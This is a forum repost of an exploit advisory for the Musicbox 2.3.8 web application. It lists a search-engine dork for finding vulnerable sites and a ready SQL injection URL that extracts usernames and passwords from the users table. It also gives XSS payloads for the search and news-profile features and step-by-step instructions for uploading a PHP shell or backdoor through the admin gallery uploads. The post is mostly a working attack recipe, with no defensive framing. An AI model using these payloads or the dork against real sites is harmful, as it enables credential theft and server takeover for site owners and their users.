Matt Posted August 27, 2013 Report Posted August 27, 2013 Description : Musicbox version 2.3.8 suffers from cross site scripting, remote shell upload, and remote SQL injection vulnerabilities.Author : DevilScreaMSource : Musicbox 2.3.8 Cross Site Scripting / Shell Upload / SQL Injection ? Packet StormCode : #Exploit Title : Musicbox 2.3.8 Multiple Vulnerabilities#Author : DevilScreaM#Date : 25/08/2013#Category : Web Applications#Vendor : http://www.musicboxv2.com/#Version : 1.0 - 2.3.8#Dork intext:Musicbox Versionintext:Musicbox Version 2.3.8 © 2008inurl:genre_albums.php?id=#Vulnerability : SQL Injection Vulnerability, XSS Vulnerability, Shell Upload Vulnerability#Tested On : Windows 7 32 Bit (Mozila & Chrome)#Greetz : Newbie-Security.or.idSQL Injection Vulnerabilityhttp://site-target/genre_albums.php?id=[SQLI]Examplehttp://site-target/genre_albums.php?id=-3+UNION SELECT 1,concat_ws(0x3a3a,username,password),3,4,5,6,7,8,9,10+from+users--==========================================================================================Cross site scripting / XSS Vulnerability*Search1. Go To Fiture Search2. Input your Cross Site Scripting, Example "<h1>Tested by DevilScreaM</h1>" , Click Search3. See Resultor See with URLhttp://site-target/index.php?in=song&term=[Cross site scripting/XSS]&action=search&start=0Examplehttp://site-target/index.php?in=song&term=<h1>Tested by DevilScreaM</h1>&action=search&start=0========================================================================================*News Profile1. Register To Website or go to link http://site-target/register.php2. Login to Website3. Go to Menu [ My News ]4. At News Heading input your XSS, Example <h1>Tested by DevilScreaM</h1>And at Detials input your XSS or TextSee your XSS at http://site-target/member.php?uname=[YOUR_USERNAME]Examplehttp://server/musicbox/member.php?uname=devilscream==========================================================================================Shell Upload Vulnerability*Artist Galery1. Go to Admin Page, And Login2. Go to Upload Artist Image or Go to Linkhttp://site-target/admin/adminpanel.php?action=artistgallery3. Select Your Shell/Backdoor , And Click Submit4. Result Upload Athttp://site-target/artist_gallery/Your_Backdoor.php============================================================================================*Album Galery1. Go to Admin Page, And Login2. Go to Upload Album Image or Go to Linkhttp://site-target/admin/adminpanel.php?action=albumgallery3. Select Option, Example Option "All Album", And Click Submit3. Select Your Shell/Backdoor , And Click Submit4. Result Upload Athttp://site-target/album_gallery/Your_Backdoor.php========================================================================================== Quote